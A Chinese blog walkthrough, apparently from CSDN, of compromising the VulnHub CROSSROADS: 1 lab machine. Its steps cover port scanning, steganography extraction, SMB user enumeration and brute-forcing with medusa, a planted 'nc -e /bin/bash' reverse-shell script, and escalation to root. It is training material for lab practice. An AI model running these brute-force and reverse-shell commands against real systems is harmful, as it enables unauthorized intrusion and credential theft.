CROSSROADS: 1实战演练

最新推荐文章于 2025-06-08 23:31:33 发布
最新推荐文章于 2025-06-08 23:31:33 发布
阅读量394 收藏 1
点赞数
分类专栏: vulnhub 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/longlangci/article/details/131338362
版权
文章详细记录了对CROSSROADS:1靶机进行的安全测试过程,包括端口扫描发现开放的80端口和Samba服务,通过dirsearch找到隐藏目录,使用隐写术工具提取图片中的隐藏信息,枚举用户并进行暴力破解得到账号密码,访问共享文件夹获取第一个flag,最后通过写入并执行shell脚本实现后渗透,进一步获得root权限并读取第二个flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

CROSSROADS: 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/crossroads-1,659/

设备名称IP地址
攻击机:kali192.168.2.20
靶机:CROSSROADS: 1192.168.2.22
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.22

# 开放WEB:80端口、Samba:139、445端口
# WEB:80端口中间件为Apache httpd 2.4.38
# Samba:139、445端口版本号为smbd 3.X - 4.X、smbd 4.9.5-Debian
# robots.txt下有一张图片crossroads.png

在这里插入图片描述

2、访问网站
http://192.168.2.22/

在这里插入图片描述

3、dirsearch扫描目录
┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u "http://192.168.2.22/"

在这里插入图片描述

4、查看隐写
http://192.168.2.22/crossroads.png

在这里插入图片描述

┌──(kali㉿kali)-[~]
└─$ steghide extract -sf crossroads.png

在这里插入图片描述

5、枚举用户
┌──(kali㉿kali)-[~]
└─$ enum4linux 192.168.2.22 -A

在这里插入图片描述

6、暴力破解
┌──(kali㉿kali)-[~]
└─$ medusa -h 192.168.2.22 -u albert -P /home/kali/rockyou.txt -M smbnt

# 账号:albert
# 密码:bradley1

在这里插入图片描述

7、访问共享文件夹
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.2.22/albert -U albert

在这里插入图片描述

8、查看第一个flag
┌──(kali㉿kali)-[~]
└─$ cat user.txt

在这里插入图片描述

9、写入shell并连接
# 写入shell
┌──(kali㉿kali)-[~]
└─$ echo "nc -e /bin/bash 192.168.2.20 9000" > smbscript.sh
# 上传shell
┌──(kali㉿kali)-[~]
└─$ smbclient //192.168.2.22/smbshare -U albert  
# 监听
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9000

在这里插入图片描述

二、后渗透
1、查看权限和SUID文件
albert@crossroads:/home/albert/smbshare$ find / -user root -perm /4000 2>/dev/null

在这里插入图片描述

2、运行程序
albert@crossroads:/home/albert$ ./beroot

在这里插入图片描述

3、切换root
# 密码:___drifting___

albert@crossroads:/home/albert$ su root

在这里插入图片描述

3、查看第二个flag
root@crossroads:/home/albert# cd /root
root@crossroads:~# cat root.txt

在这里插入图片描述

crossroads:一个针对未来可能返回哈佛暑期学生的Web应用程序,其中包含来自过去哈佛暑期学生的有用信息,技巧和建议
05-02
十字路口 CSCI S-71敏捷软件开发小组项目 团队: A队 项目介绍: 一个适用于哈佛未来/潜在/重返夏季学生的Web应用程序,其中包含过去/现在的哈佛夏季学生的有用信息,技巧和建议。 您可以在这里找到我们的项目: : ...
前端项目-crossroads.zip
09-02
1. **路由解析**:crossroads.js允许开发者定义URL模式,并将其与特定的处理函数关联。当URL改变时,crossroads.js会自动解析URL并找到相应的处理函数执行。 2. **灵活性**:由于其设计,crossroads.js不仅适用于...
crossroads1 靶机
lx_Zyu的博客
06-05 541
有一个beroot 运行一下 要我们输入root用户的密码回车,我们没有密码。文件夹下的这个文件大小要网页上的那个文件大,里面可能藏有东西。这里使用file是查看一下这些文件是什么文件类型。发现网页上的这个图片和文件里面的这个图片不一样。cd 进去发现有一些文件,使用file查看一下。发现在其下有一个png和网页上的那个名字一样。ls查看一下有个smb.conf 文件。还有一个user.txt文件 看一下。执行完后在本地生成一个results。开启靶机的web服务 8000端口。
CROSSROADS1靶机复盘
weixin_44681307的博客
07-16 389
我们就想到了刚才跟靶机中拷贝到我们自己电脑上的图片文件,经过尝试,这个图片是利用stegoveritas 把数据隐写进去的,首先我们安装stegoveritas工具,需要用到python。我们发现配置文件里面显示SMB会执行的一个脚本,但是smb里面又没有这个脚本,所以我们可以自己创建一个这样的脚本,然后上传到smb上面来。这里我们发现很多文件,挨个file以下,发现有一个text文件,查看了以下发现是个密码字典,我们把这个密码字典拷贝走。发现只有一个文件,我们get到我们本机上,这是smb的配置文件。
Rhythm-and-Roads:节奏与道路网站
03-07
通过这些组件的协同工作,"Rhythm-and-Roads:节奏与道路网站"能够为用户提供一个集音乐、互动和探索于一体的独特网络空间。无论是音乐爱好者还是开发者,都能从中感受到HTML技术带来的无限可能。
forest_roads:美国林务局数据样式表
07-02
shp2pgsql -I -W LATIN1 S_USA.RoadCore_FS.shp forest_roads | psql -d forest_roads -q -U richard shp2pgsql -I -W LATIN1 S_USA.AdministrativeForest/S_USA.AdministrativeForest.shp forest_boundaries | ...
Crossroads Tab by Cream .pdf
09-11
Crossroads Tab by Cream》是一份专为中级进阶吉他手设计的曲谱,它包含了著名乐队Cream演绎的经典摇滚乐曲目《Crossroads》的吉他部分乐谱。这首歌曲在全球吉他爱好者中广受欢迎,尤其对于想要挑战更高级演奏技巧...
LinuxLinux 环境变量
Antonio915的博客
06-04 1039
每个程序都会收到一张环境表,环境表是一个字符指针数组,每个指针指向一个以’\0’结尾的环境字符串。
19-项目部署(Linux)
2301_80368429的博客
06-03 1425
不同领域的主流操作系统,主要分为以下这么几类: 桌面操作系统、服务器操作系统、移动设备操作系统、嵌入式操作系统。接下来,这几个领域中,代表性的操作系统是那些?1). 桌面操作系统操作系统特点Windows用户数量最多MacOS操作体验好,办公人士首选Linux用户数量少(桌面操作系统,Linux使用较少)2). 服务器操作系统操作系统特点Unix安全、稳定、付费Linux安全、稳定、免费、占有率高付费、占有率低3). 移动设备操作系统操作系统特点Android。
从零开始打造 OpenSTLinux 6.6 Yocto 系统(基于STM32CubeMX)(十二)
小柯的博客
06-08 136
本文介绍了YT8511网络驱动在Linux内核中的修改方法。针对使用ST官方YT8511驱动时出现的根文件系统网络问题,需要替换两个关键文件:将motorcomm.c替换到drivers/net/phy/目录,motorcomm_phy.h替换到include/linux/目录。文档详细提供了内核重新编译的完整命令流程,包括配置合并、镜像生成、模块安装和设备树复制等步骤。最后给出了通过NFS启动的bootargs环境变量设置示例,并附带了操作过程截图。该解决方案可确保系统正常使用nfsroot启动网络功能。
Linux 中替换文件中的某个字符串
刘皇叔说Java的博客
06-06 582
或其他特殊字符,可以改用。如果你想在 Linux 中。:仅在第 5 行替换。
操作系统中的设备管理,Linux下的I/O
m0_74985290的博客
06-05 1199
其中,设备独立性软件、设备驱动程序、中断处理程序属于操作系统的内核部分,即“I/O 系统”,或称“I/O 核心子系统”。
[Linux] MySQL源码编译安装
qq_53232485的博客
06-03 957
本文详细介绍了MySQL 5.7.20源码编译安装过程。主要内容包括:环境包安装(需cmake等工具)、创建mysql系统用户、解压源码包、使用cmake配置编译参数(指定安装路径、字符集等)、多核编译(make -j4)、安装后的权限配置(chown)、修改my.cnf配置文件、设置系统环境变量、初始化数据库以及通过systemd管理MySQL服务。重点强调了采用cmake编译方式,并提供了完整的编译参数和配置模板。
Linux nano命令的基本使用
菜鸟记录
06-08 641
Linux nano命令的基本使用
Linux--vsFTP配置篇
最新发布
wu041224的博客
06-08 730
匿名用户无法上传文件 检查 anon_upload_enable=YES,并确认 /var/ftp/pub 有写权限。检查 vsftpd 是否安装 rpm -qa | grep vsftpd。anon_mkdir_write_enable=YES # 允许匿名创建目录。查看配置文件 cat /etc/vsftpd/vsftpd.conf。1. 修改配置文件 /etc/vsftpd/vsftpd.conf。启动 vsftpd service vsftpd start。
Linux 停止支持 486 和第一代奔腾处理器
bugsycrack的博客
06-05 399
资深内核开发者 Ingo Molnar 解释说,为了支持已经很少有人使用的旧 x86-32 架构,内核开发者花费了很多力气去实现兼容性。我在部署交叉编译环境的时候就尽量不用i386的库,谁用谁知道,后患无穷。Linux 作者 Linus Torvalds 在内核邮件列表上表示是时候放弃支持 i486 了,不值得在 i486 上浪费开发精力。未来对 x86 CPU 的支持最低将是 P5 微架构的奔腾处理器。即将发布的 Linux 6.15 将停止支持有 36 年历史的 486 以及第一代奔腾处理器。
linux 故障处置通用流程-36计-14-27
bcxwz669的博客
06-05 1198
使用ethtool命令,查看网卡配置是否正常,主要关注网卡连接模式(10/100/1000baseT)及工作模式(Half/Full)。配置文件:检查/etc/passwd,/etc/hosts,/etc/services等配置文件是否正常;#tail -2000 /var/log/messages 查看日志信息。查看日志:tail -f /var/log/messages;查看日志:tail -f /var/log/messages。查看日志:tail -f /var/log/messages。
Linux【3】-----系统框架概述
m0_46451722的博客
06-07 368
linux一定需要挂载操作系统一切皆文件。
Linux Core 文件查看和调试
xx155802862xx的博客
06-05 463
通过设置和生成 core 文件,可以在程序崩溃时获取详细的调试信息。结合 GDB 等调试工具,可以深入分析 core 文件,找到程序崩溃的具体原因,并进行相应的修复。掌握这些调试技巧,对于提高程序的稳定性和可靠性具有重要意义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值